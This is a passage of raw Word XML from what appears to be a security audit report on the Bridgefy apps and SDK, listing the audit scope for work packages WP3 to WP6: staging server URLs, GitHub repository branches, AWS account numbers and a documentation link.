        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-sdk-android/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2880" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2880" w:right="386" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-sdk-ios/tree/big-feature/securit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>y-audit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>App</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URLs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.app.bridgefy.services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="37" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.sdk.bridgefy.services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.broker.bridgefy.services:8084</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>wss://staging.broker.bridgefy.services:8084</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mongodb+srv://staging.whqu3.mongodb.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-app-backend/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-APP-infra/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-sdk-backend/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-SDK-infra/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Accounts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hosting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>backend)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>authenticating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>regular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Consulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Documentation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="2160" w:right="475"/>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://bridgefy.notion.site/Bridgefy-b46fb4d837574bbfa36e9210d746d86</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-10"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
